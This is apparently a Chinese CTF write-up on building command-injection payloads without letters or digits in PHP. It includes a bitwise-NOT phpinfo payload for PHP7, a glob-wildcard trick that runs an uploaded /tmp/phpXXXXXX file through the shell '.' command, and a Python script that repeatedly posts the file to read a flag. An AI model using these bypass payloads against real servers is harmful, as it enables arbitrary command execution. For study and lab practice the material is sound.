无数字字母构造webshell二

源代码如下
无数字字母构造webshell二
可以看到他过滤了$_
而且payload的长度不能超过35,针对这样的情况,P神也做出了解决

PHP7下简单解决问题

PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。所以,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。

所以很简单了,构造一个可以生成phpinfo这个字符串的PHP表达式即可。payload如下(不可见字符用url编码表示):
(~%8F%97%8F%96%91%99%90)();

关于php5的解决

我们可以使用

shell下可以利用.来执行任意脚本
Linux文件名支持用glob通配符代替

来解决
.或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如,当前运行的shell是bash,则. file的意思就是用bash执行file文件中的命令。

用. file执行文件,是不需要file有x权限的。那么,如果目标服务器上有一个我们可控的文件,那不就可以利用.来执行它了吗?

这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母,6个随机字符最后一个字符是大写的所以可以根据这个特性取glob取匹配

第二个难题接踵而至,执行. /tmp/phpXXXXXX,也是有字母的。此时就可以用到Linux下的glob通配符:

*可以代替0个及以上任意字符
?可以代表1个任意字符
那么,/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。
但我们尝试执行. /???/?????????却会爆错,这是因为用这样的方法匹配到的文件会很多
那么,我们可以利用[@-[]来表示大写字母
无数字字母构造webshell二
然后就可以进行任意命令执行了

整个攻击过程总结

  • 自己写一个文件上传的脚本,将我们含有要执行的命令的文件上传上去
  • 利用本来的命令执行漏洞打入我们的无字母字符的payload
  • 任意命令执行

这里的[@-[]是在ascii码中A-Z的一个临界这是glob支持的一种语法[^-]值的是不包含-的
你Post上去的文件默认是放在tmp/phpxxxxxx里面的最后一个字符一般为大写

这里放一个post文件的脚本

import requests
while True:
    url = "http://      /?c=. /???/????????[@-[]"

    r = requests.post(url, files={"file": ("dota.txt", "cat flag.php")})
    flag = r.text.split('flag')
    if len(flag) >1:
        print(r.text)
        break
上一篇:Sql Server2005 日志截断及发送邮件命令


下一篇:EZ-webshell